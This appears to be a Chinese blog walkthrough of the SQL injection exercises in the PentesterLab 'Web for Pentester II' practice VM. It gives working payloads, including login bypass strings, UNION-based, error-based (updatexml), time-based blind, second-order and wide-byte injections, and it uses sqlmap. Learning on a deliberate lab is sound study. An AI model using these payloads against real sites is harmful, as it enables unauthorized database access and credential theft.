环境安装

随便在网上找了个Pentester的靶场,结果是2013年的,那就从2013年的这个靶场开始学习

下载镜像的地址:

https://pentesterlab.com/exercises/web_for_pentester_II/iso

正常找个虚拟机,进行iso的安装

安装完成后,查下虚拟机的IP,直接访问即可http://192.168.29.129/

sql注入

Example 1

万能密码:

自己尝试了几个密码,筛选出了这几个通关的,亲试可用:

admin'or 1=1#

"or"="a'='a

a'or' 1=1--

'or''='

用户名和密码都填一样的,点击提交通关

Example 2

通过order by语句确定字段的长度为3  --此处需要浏览此文的人自行学习,免得就无难度了

加粗部分为所需要填的注入语句,访问后通关

http://192.168.29.129/sqlinjection/example2/?username=1' union select 1,2,3 --+&password=2&submit=%E6%8F%90%E4%BA%A4

Example 3

去猜他的sql语句大概

select * from users where username='a' and password='b'

在尝试过程中发现使用单引号没有作用

尝试去构造及规避:

select * from users where username='\' and password=' or 1=1#'

用\做用户名,or 1=1#做密码直接登录

说白了就是执行了这段:

SELECT * FROM users where username="x" or 1=1#"

Example 4

在通过尝试发现界面会返回错误后,可以使用报错注入

案例4可以尝试报错注入:
http://192.168.29.129/sqlinjection/example4/?req=username and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)

以此类推,找到其他需要的信息

Example 5

起初用order by 来爆字段长度,结果发现一直报错

如果order by无法使用则直接上union 用字段来尝试破试出长度,发现长度就是之前试出来的3

union select 1,2,3

增加一个长度4,报错:

之后修改数字1,2的信息即可:

直接暴库即可,直接拿sqlmap去爆它,我这边有篇sqlmap的文章,可以看我的安全专栏里面有介绍:

Example 6

同样先爆字段长度用order by,发现这个可以爆,长度是3

之后再用union思路一样:

Example 7

属于时间盲注,此处界面没有显示信息的地方,只能通过猜字段的形式来进行

通过大于、小于、等于来进行,发现本库的字段为21

http://192.168.29.129/sqlinjection/example7/?id=1 and if(length(database())=21,sleep(5),1) --+

通过sqlmap爆一下,判断出来能注入后直接爆:

Example 8

此处的案例是二次注入,使用

a' union select 1,2,3# 进行二次注入:

查询列表,爆url,通过dirsearch爆出目录users,虽然是500但证明存在这个目录:

尝试列表中的数字,发现4可以进行注入:

Example 9

宽字节注入尝试,对于mysql数据库的测试:

发现存在注入,添加成功

%df%27%20or%201=1%23

大家可以安装后自己尝试,sql注入对于现在大厂基本上已经防的很厉害了,所以大家可以学习下安全漏洞相关的思路,也可以应用于其他功能测试中,用于验证功能异常。

希望对大家有帮助!

PentesterLab靶场sql注入流程相关推荐

  1. Pikachu靶场—sql注入通关

    Pikachu靶场-SQL注入篇 前言 一.数字型注入 二.字符型注入 三.搜索型注入 四.XX型注入 五.insert注入 六.delete注入 七.http header注入 八.盲注:基于布尔盲 ...

  2. Pikachu靶场-SQL注入-搜索型注入过关步骤

    Pikachu靶场-SQL注入-搜索型注入过关步骤 首先要明白MySQL数据库模糊搜索的语句,like '常%'.like '%常'.like '%常%' 这个几个,这里就不详说这个语句了 判断注入点 ...

  3. iwebsec靶场 SQL注入漏洞通关笔记4- sleep注入(时间型盲注)

    系列文章目录 iwebsec靶场 SQL注入漏洞通关笔记1- 数字型注入_mooyuan的博客-CSDN博客 iwebsec靶场 SQL注入漏洞通关笔记2- 字符型注入(宽字节注入)_mooyuan的 ...

  4. JAVA代码审计之WebGoat靶场SQL注入

    文章目录 前言 WebGoat IDEA部署靶场 No.1 回显注入 No.2 布尔盲注 No.3 Order by 代审技巧 SQL注入挖掘 SQL注入防御 Fortify体验 总结 前言 为了从自 ...

  5. supersqli(SQL注入流程及常用SQL语句)

    目录 一.SQL注入知识学习 1.判断注入类型 (1)数字型注入判断 (2)字符型注入判断 2.猜解sql查询语句中的字段数(order by 的使用) 3.判断显示位爆数据库的名字 4.注释(--+ ...

  6. 测试具有44个漏洞点的简单小靶场-SQL注入篇

    文章目录 本地搭建 SQL注入篇 注入1(数字型注入) 注入2(闭合单引号) 注入3(闭合双引号) 注入4(闭合括号) 注入5(报错注入) 注入6(布尔盲注) 注入7(过滤了'--'和'#'以及'%2 ...

  7. oracle 注入靶场,pick靶场-sql注入

    甲.数字型注入 数字型注入一般提交值没有引号,所以直接在后面构造语句就可以了. 抓包查看 构造语句 提交后 该数据库表内容被爆出来了. 乙.字符型注入 首先我们要知道一点,字符串在数据库中提交是需要用 ...

  8. sqli-labs第五关sql注入流程

    正常访问 http://127.0.0.1/sqli-labs-master/less-5/?id=1 判断注入类型 http://127.0.0.1/sqli-labs-master/less-5/ ...

  9. sql注入 练手网站_靶场sql注入练手----sqlmap篇(纯手打)

    绝大数情况下,管理员的账号密码都在admin表里 查询字段名 构造 ?id=1 and 1=2 union select 1,column_name from information_schema.c ...

最新文章

  1. 从大规模文献库中实现生物医学关系抽取
  2. 赫夫曼树建立c语言源程序编译结果详细解释,哈夫曼树的建立与实现最终版(备份存档)...
  3. lamp安装指南(转)
  4. 记一次synchronized锁字符串引发的坑兼再谈Java字符串
  5. 聊聊storm nimbus的LeaderElector
  6. .NET Core 3中的性能提升(译文)
  7. jdk8切换成jdk6_运行中的JDK语言功能预览:切换表达式
  8. 修改Cocos2d-X-3.2中的setup.py, 使其能用python3
  9. Gartner:2022年全球IT支出将超4万亿美元,软件增速最高
  10. procyon java8_java jdk 8反编译工具JD-GUI、procyon-decompiler、luyten、crf下载使用简介
  11. oracle ogg11.2下载,ogg config for sqlserver 2012 to oracle 11.2(ogg 12.1 to 12.2)
  12. 卡巴斯基7.0离线更新升级包病毒库
  13. php sql注入防御方法,php怎么防御sql注入
  14. DX11梯台旋转运动
  15. Oracle中Minus的使用
  16. 总结 | 人生如逆旅,我亦是行人
  17. 基于Spark的电商用户行为分析系统的设计与实现
  18. 计算机社团活动照片,电脑绘画兴趣小组活动记录表Word版
  19. 各大邮箱网址用哪个好?企业内部邮箱哪个比较好用?
  20. C语言_函数递归举例

热门文章

  1. 保研面试/考研复试概率论与数理统计问题整理
  2. 【runloop】performSelector方法探究
  3. 服务器系统2003资源监视器在哪里,系统资源监视器在哪里
  4. iphone补电代码大全_手机资讯:iPhone ICCID激活策略和运营商查询地址大全
  5. Capture One pro 21 for Mac(RAW转换和图像编辑工具)
  6. Vc++ - mfc - 象棋(末)- 网络象棋
  7. GridView分页实现
  8. 小鱼易连发布全新智能会议终端产品 引领云视频会议市场
  9. 使用z-file和七牛云对象存储构建个人网盘
  10. vue-infinite-scroll无限滚动组件